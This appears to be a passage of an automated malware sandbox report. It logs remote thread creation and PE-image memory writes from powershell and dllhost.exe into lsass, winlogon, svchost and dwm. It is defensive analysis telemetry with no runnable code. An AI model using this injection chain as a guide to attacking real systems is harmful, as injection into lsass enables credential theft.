Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 612D2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\winlogon.exe EIP: DC612EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\lsass.exe EIP: C0AB2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 612D2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\dwm.exe EIP: AEDC2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 87992EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 53772EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 5D532EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 67D2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\dwm.exe EIP: AED92EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 87992EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 53772EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 5D532EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 67D2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 5B3A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 5B372EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: ECD42EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: EBFD2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 59072EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: A9E72EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 73162EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 4E862EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 59042EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: A9E72EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 73162EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 4E862EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 47B32EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 473C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 70062EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 83BC2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 6F9D2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 83BC2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: D3FA2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: D3F72EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: A4182EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: A4152EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: BDF62EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C0262EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C9F32EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 645B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7B2A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4F62EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2AB42EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4ADB2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1992EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 25DA2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F5352EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F0D62EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FFB2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C2572EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8BCF2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 66902EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13FF2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: BDF32EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8D572EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 69B42EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C0262EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CC742EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C9F32EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5DA72EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 645B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 199D2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7B2A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F3892EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4F62EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3B82EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2AB42EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 40E42EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4ADB2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A6532EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1992EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 29CC2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 25DA2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7B152EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F5352EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 621A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F0D62EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2F482EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FFB2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8B542EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C2572EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 683D2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8BCF2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9072EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 66902EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2E262EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13FF2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6C5E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8D572EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 69B42EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FC652EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CC742EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 777C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5DA72EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 33B42EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 199D2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8D0A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F3892EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AB4C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3B82EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2A642EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 40E42EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6CF32EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A6532EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 49352EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 29CC2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 602E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7B152EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5E7B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 621A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2F7C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2F482EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E8152EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8B542EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 52342EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 683D2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9DA92EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9072EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2E262EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6C5E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D5932EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FC652EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 777C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 33B42EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8D0A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AB4C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2A642EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6CF32EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 49352EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 602E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5E7B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E8152EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9DAC2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 602E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5C3B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 23332EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1C3D2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BA882EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5C3B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5FEF2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4B1D2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1C3D2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E0062EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BA882EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BF25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5FEF2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4B1D2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E0062EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BF25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D825AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B525AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B725AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EB25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: ED25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FC25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FE25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12625AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DB25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DD25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6525AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11525AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C525AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C725AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C725AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5C25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5E25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BF25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D825AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DA25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11725AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7B25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7D25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5F25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5D25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5F25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F625AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12525AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C525AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C725AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7B25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7D25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10525AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9B25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11525AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11725AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EF25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FD25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FF25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C825AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D525AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6625AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12E25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13725AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11E25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C525AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C725AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C525AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14525AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D525AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6625AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6825AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BF25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13F25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12825AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12A25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D625AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D825AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EA25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EC25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3B25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8F25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7B25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7D25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13E25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E625AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13F25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11525AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14625AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14825AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7525AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7725AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13725AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13525AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6E25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C525AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CB25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7725AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5E25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7E25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AF25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AD25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5E25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7B25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7E25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AF25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AD25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FC25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7B25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5D25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FC25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7625AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5D25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C825AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12525AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7625AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12525AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A725AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A725AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6E25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D725AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F825AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FA25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D725AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DD25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 167A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 167D2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 23BC2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 23BF2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 81C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8E32EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A5E72EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A5EA2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 17762EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 186A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\wbem\WMIADAP.exe EIP: 52A12EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\wbem\WMIADAP.exe EIP: 52A12EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 56425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2E825AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 30B25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 34D25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D0DE2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F0B92EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D0F72EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\Conhost.exe EIP: 3D02EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 36152EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 50472EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FB052EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FB052EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\Conhost.exe EIP: E5672EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FD322EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C8FA2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CB042EBC
Injects a PE file into a foreign processes
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 2BAAED90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 2BAAEDC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26A87990000 value starts with: 4D5A
